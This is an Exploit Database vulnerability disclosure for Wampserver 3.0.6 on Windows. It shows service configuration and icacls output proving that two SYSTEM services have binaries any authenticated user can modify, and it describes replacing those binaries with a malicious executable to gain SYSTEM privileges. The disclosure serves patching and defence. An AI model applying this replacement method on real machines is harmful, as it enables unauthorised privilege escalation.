Wampserver 3.0.6 – Insecure File Permissions Privilege Escalation

• Exploit Database
• 16 阅读

• 作者： Heliand Dema
  日期： 2016-12-26
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40967/

• =====================================================
  # Vendor Homepage: http://www.wampserver.com/
  # Date: 10 Dec 2016
  # Version : Wampserver 3.0.6 32 bit x86
  # Tested on: Windows 7 Ultimate SP1 (EN)
  # Author: Heliand Dema
  # Contact: heliand@cyber.al
  =====================================================
   
  Wampserver installs two services called 'wampapache' and 'wampmysqld'
  with weak file permission running with SYSTEM privileges.
  This could potentially allow an authorized but non-privileged local user
  to execute arbitrary code with elevated privileges on the system.
  
  C:\>sc qc wampapache
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: wampapache
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 3 DEMAND_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME :
  "c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe" -k runservice
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : wampapache
  DEPENDENCIES : Tcpip
   : Afd
  SERVICE_START_NAME : LocalSystem
  
  
  
  PS C:\> icacls c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
  c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
  BUILTIN\Administrators:(I)(F)<--- Full Acces
  NT AUTHORITY\SYSTEM:(I)(F)
  BUILTIN\Users:(I)(RX)
  NT AUTHORITY\Authenticated
  Users:(I)(M) <--- Modify
  
  
  C:\Windows\system32>sc qc wampmysqld
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: wampmysqld
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 3 DEMAND_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME :
  c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe wampmysqld
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : wampmysqld
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  
  PS C:\> icaclsc:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
  c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
  BUILTIN\Administrators:(I)(F)<--- Full Acces
   NT AUTHORITY\SYSTEM:(I)(F)
   BUILTIN\Users:(I)(RX)
   NT AUTHORITY\Authenticated
  Users:(I)(M) <--- Modify
  
  
  Notice the line: NT AUTHORITY\Authenticated Users:(I)(M) which lists the
  permissions for authenticated however unprivileged users. The (M) stands
  for Modify, which grants us, as an unprivileged user, the ability to
  read, write and delete files and subfolders within this folder.
  
  
  ====Proof-of-Concept====
  
  To properly exploit this vulnerability, the local attacker must insert
  an executable file called mysqld.exe or httpd.exe and replace the
  original files. Next time service starts the malicious file will get
  executed as SYSTEM.